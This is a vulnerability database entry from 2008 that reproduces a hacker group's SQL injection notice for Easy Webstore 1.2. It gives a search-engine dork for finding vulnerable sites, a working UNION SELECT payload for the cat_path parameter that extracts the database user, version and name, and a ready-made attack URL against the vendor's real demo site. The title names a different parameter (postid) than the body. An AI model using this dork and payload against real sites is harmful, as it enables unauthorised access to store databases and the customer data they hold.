Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability

2008-06-19T00:00:00
ID SSV:8764
Type seebug
Reporter Root
Modified 2008-06-19T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## Easy Webstore v1.2  ( index.php cat_path )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ATsDp.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script  : Easy Webstore v1.2
##
## site    : www.webstorexpert.com
##
########################
########################
##
## d0rk :  allinurl: "index.php?cat_path"
##
##
##     -(:: SQL ::)-
##
##    www.site.com/
##          index.php?cat_path=-1+union+select+concat(user(),0x2F2A2A2F,version(),0x2F2A2A2F,database())/*
##
##  -(:: L!VE DEMO ::)-
##
##    http://www.webstorexpert.com/demo/index.php?cat_path=-1+union+select+concat(user(),0x2F2A2A2F,version(),0x2F2A2A2F,database())/*
##
#######################
#######################
 -(:: NOTE ::)-
<< Cant see no thing in the page :)) open the image and get the info in the link ;) >>
 
#######################################################################################################
#######################################################################################################
 
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 
 :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################